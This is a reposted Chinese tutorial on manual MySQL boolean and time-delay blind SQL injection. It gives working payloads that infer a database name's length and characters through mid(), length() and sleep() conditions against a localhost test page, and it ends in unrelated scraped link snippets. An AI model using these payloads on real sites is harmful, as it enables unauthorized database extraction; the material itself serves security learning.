2. 程式人生 > >十幾分鍾讓你學會MySQL布林和延遲盲注手工操作

十幾分鍾讓你學會MySQL布林和延遲盲注手工操作

阿新 發佈:2018-12-28

作者:Max老白Gān丶
連結:http://www.lofter.com/lpost/1fefbc76_12d25dc31
來源:LOFTER

  • 注入常用到的幾個函式


  •  

  •  

    1

    mid(str,1,3)
    字串獲取

    這裡我們要看到123456789 從第一個位元組也就是1開始獲取到3就截止了

  •  

    1

    ORD()
    轉換為ASCII碼

    我們看到這裡把a轉換成了97 我們去看
    對照表

  •  

    1

    Length()
    統計位元組長度

  •  

    1

    version()
    檢視資料庫版本 

  •  

    1

    database()
    檢視資料庫

  •  

    1

    user()
    檢視當前使用者


首先我們確定注入了驗證要先獲取資料庫長度

1

2

and length(database())

or length(database())


  我們先看一下資料庫中sqltest長度【其實就是7個】

小知識點:有資料用and 沒資料用or

1

http://localhost/test.php?id=1and length(database()) >1 #

1

and length(database()) >1 #:

意思是資料庫的長度是否大於1
沒有變化以此類推
發現變換


這時候我們要確定他到底是多少位元組

1

http://localhost/test.php?id=1' and length(database()) = 8 %23


他等於8嗎?不等於

他等於6嗎?不等於

他等於7返回正確頁面說明他的位元組是7



現在我們獲取資料庫名字:

1

http://localhost/test.php?id=1' and mid(database(),1,1) ='1'%23

1

mid(database(),1,1) ='1'

:它的意思是從第一個獲取每次只取一個 它等於1嗎?
很顯然不等

然後修改後面的以此類推我們試到

1

http://localhost/test.php?id=1' and mid(database(),1,1) ='s'%23


返回true的正確頁面

如果我們想獲取第二位第三位怎麼辦?

1

2

3

4

5

6

7

mid(database(),2,1)

mid(database(),3,1)

mid(database(),4,1)

mid(database(),5,1)

mid(database(),6,1)

mid(database(),7,1)

http://localhost/test.php?id=1' and mid(database(),2,1)  ='q'%23


剩下的我就不一一獲取了學習這樣方式就明白了。

延時注入方法:

常用的判斷語句:

1

2

3

4

5

6

7

8

9

' and if(1=0,1, sleep(10)) --+   

 

" and if(1=0,1, sleep(10)) --+

 

) and if(1=0,1, sleep(10)) --+

 

') and if(1=0,1, sleep(10)) --+

 

") and if(1=0,1, sleep(10)) --+



為什麼我和布林注入寫在一個文章裡面哪?因為他們操作的流程是差不多的。



延時了10秒確定存在注入。

獲取資料庫長度利用上面的知識:

1

'and if(length(database())=9,sleep(10),1)--+


意思是如果資料過長度等於9他就延時10秒

1

'and if(length(database())<6,sleep(10),1)--+


如果一開始不知道他長度可以用這個大致判斷的長度然後用上面的等於確定
長度小於6嗎?沒有延遲不小於6


小於9嗎?




延遲成功表名資料庫小於9 也就是說資料庫長度在6-9之間

1

'and if(length(database())=7,sleep(10),1)--+


一 一測試我們確定長度是7

獲取資料庫名字:

1

http://localhost/test.php?id=1' and if(mid(database(),1,1) ='s',sleep(10),1)--+


相關推薦

學會MySQL布林延遲手工操作

作者:Max老白Gān丶 連結:http://www.lofter.com/lpost/1fefbc76_12d25dc31 來源:LOFTER 注入常用到的幾個函式     1 m

分鐘學會MySQL布爾延遲手工操作

commons height too 什麽 有變 mysq 利用 s2d 不知道 作者:Max老白Gān丶鏈接:http://www.lofter.com/lpost/1fefbc76_12d25dc31來源:LOFTER 註入常用到的幾個函數

一頓飯學會作業排程程序排程

場景:畢業師兄請我們去鳳雛吃飯。 流程:菜由後廚做好,然後由服務員端上飯桌,接著我們吃飯。 服務員排程演算法:後廚的菜做好,由服務員選擇端哪個菜上桌,這個服務員是兼洗碗的,她今天晚上還有個約會,所以她希望儘早地把碗刷完去約會,所以她的排程演算法是,看哪個菜比較快吃掉,就先上

一篇博客學會部署社交網站( SVN+nginx+PHP+MySQL+MFS 內含所有源碼包)

con 從服務器 etc ini support php 添加 php程序員 type 根據公司要求,實施過程大致如下:1 部署SVN服務器,為PHP程序員創建repo目錄的訪問賬戶,通知程序員可以導入代碼2 部署nginx服務器3 部署PHP服務器4 部署MySQL主從服

分鐘教學會 ToolBar 的使用(轉)

window map pri end case instance em1 oom title 轉自:http://blog.csdn.net/itguangit/article/details/52042203 1.和平常一樣,新建一個Moudle 在xml布局文件中使用

張圖徹底了解JAVASE、JAVAEE、JAVAWEB整個的知識體系

javaweb 分享圖片 知識 TP 技術分享 了解 src bubuko ima 幾張圖讓你徹底了解JAVASE、JAVAEE、JAVAWEB整個的知識體系

買不起蘋果Xs?《海賊王》中的這些惡魔果實分鐘成為土豪

是的 ofo ref 不想 是你 終究 one 投資 沒有 今天,蘋果手機頒布了它們2018年的新品iphone Xs。 不外這個手機卻由於超高的售價讓許多網民非凡很是的不滿。 雖然像這種土豪手機,小編是想都不敢想的,手內中的諾基亞還能用一段時刻。 除非我能擁有《海賊王》中

vue新手入門指導,一篇學會vue技術棧,本人初學時候的文件

今天整理文件突然發現了一份md文件,開啟一看 瞬間想起當年學習vue的艱難路,沒人指導全靠自己蒙,下面就是md文件內容,需要的小夥伴可以打開個線上的md編譯器看一看,我相信不管是新人還是老人  入門總是可以的(這只是初學時候做的筆記,如果有哪裡寫錯了還望聯絡我修改,免得誤導其他新人,本人qq:421

10分鐘明白MySQL是如何利用索引的

一、前言 在MySQL中進行SQL優化的時候,經常會在一些情況下,對MySQL能否利用索引有一些迷惑。 譬如: MySQL 在遇到範圍查詢條件的時候就停止匹配了,那麼到底是哪些範圍條件? MySQL 在LIKE進行模糊匹配的時候又是如何利用索引的呢? MySQL 到

一篇就學會webpack4

webpack 是一個現代 JavaScript 應用程式的靜態模組打包器,目前最流行的打包神器,接下來聊一下webpack4 首先webpack4要求node版本在8.5以上,cmd中node -v檢視node版本。 1.什麼是webpack WebPack可

一篇文章瞭解MySQL

一篇文章帶你讀懂MySQL 作為一名開發人員來說,資料庫知識是必不可少的,博主曾經年少無知的時候因為不瞭解資料庫而被京東拒之門;無論是基於檔案的Sqlite,還是工程上使用很多的MySQL、PostgreSQL/SQL Server;但是都沒有對資料庫有一個清

深入淺出,一篇文章學會Dagger2使用

本篇文章已授權微信公眾號 guolin_blog (郭霖)獨家釋出 前言 最近在做專案中,用到了Dagger2,所以找了一些部落格並參考了菜鳥窩Ivan的視訊,算是知道如何使用了,但是對其理解還相差很遠。所以這篇文章重點針對如何使用和使用中常見的一些問題

不要再說SEO沒出路了,SEO的種賺錢方式走上小康

我深深的想要通過的自己的SEO技術賺錢。其實,掌握一門技術是次要方面,學會把技術變現才是重中之重,所以你說學習SEO重要嗎?挺重要,但絕不是最重要的。學SEO的賺錢方式才是最重要的。 那麼SEO都有哪些賺錢方式呢?我羅列了十種賺錢方式,這是我目前看到的風景,也許還有別的

一張圖學會Python,學習Python的簡單,小白的福利

網上有這樣一張圖片,資訊量很大,通常會被配上標題“一張圖讓你學會Python”: 點選圖片可檢視大圖     這張圖流傳甚廣,但我沒有找到明確的出處,圖片上附帶了 UliPad 的作者 Limodou 的資訊,很有可能是原作者。如有知情者可留言告訴我。

5分鐘學會用最高效的工具解析所有Json

如果你是一個Android開發工程師,學會解析Json字串是你的必修課,本篇文章主要以例項的方式手把手教你怎麼做,花五分鐘時間閱讀本篇文章你就可以學會解析所有的Json字串啦。 準備: json字串fastjsonHiJson格式化json工具開始教程: fastjson

行程式碼帶用Python批量實現txt轉xls,方便快捷

前天看到後臺有一兄弟發訊息說目前自己有很多txt 檔案,領導要轉成xls檔案,問用python怎麼實現,我在後臺簡單回覆了下,其實完成這個需求方法有很多,因為具體的txt格式不清楚,當然如果是有明確分隔符的會更好處理些,可以直接把txt檔案轉成csv檔案,這樣可以用excel開啟後就是表格的樣式了,如果直接要

程式設計師看過這篇文章 學會閱讀原始碼!

摘要:隨著越來越多的公司使用敏捷開發,能夠閱讀別人的程式碼比以往顯得更重要。這就需要學習一些如何提高這項技能的技巧。本文提供了幾種提高程式碼閱讀技巧的方法。 在軟體開發人員的職位描述中有閱讀原始碼。然而,這體驗並不總能令人愉悅。不是每個人都喜歡閱讀別人的程式碼,因為他們覺得

3分鐘學會如何團隊管理!打造高效團隊!

團隊管理超級表格微視訊關鍵詞:   建立團隊  新增成員  加入團隊  企業成員「超級表格微視訊」第五期提升效率、 增強免疫力,盡在超級表格微視訊!請關注每週的公眾號更新,3分鐘讓您玩轉超級表格!如何釋出表單搜尋團隊最直接的用處就是在共享表格時,無須輸入難記的郵箱或者手機號,

IFE第二到第二一天:頁面對話

test1 <!DOCTYPE html> <html> <head> <meta charset="UTF-8">

一篇文章學會jsonGson---json全面詳細解析

現在企業越來越多的使用json返回資料,因此熟練使用json解析,是程式設計師必不可少的技能。 一、對json的理解 1)JSON(JavaScript Object Notation, js 物件標記) (javascript 物件標記語言) 是一種輕量級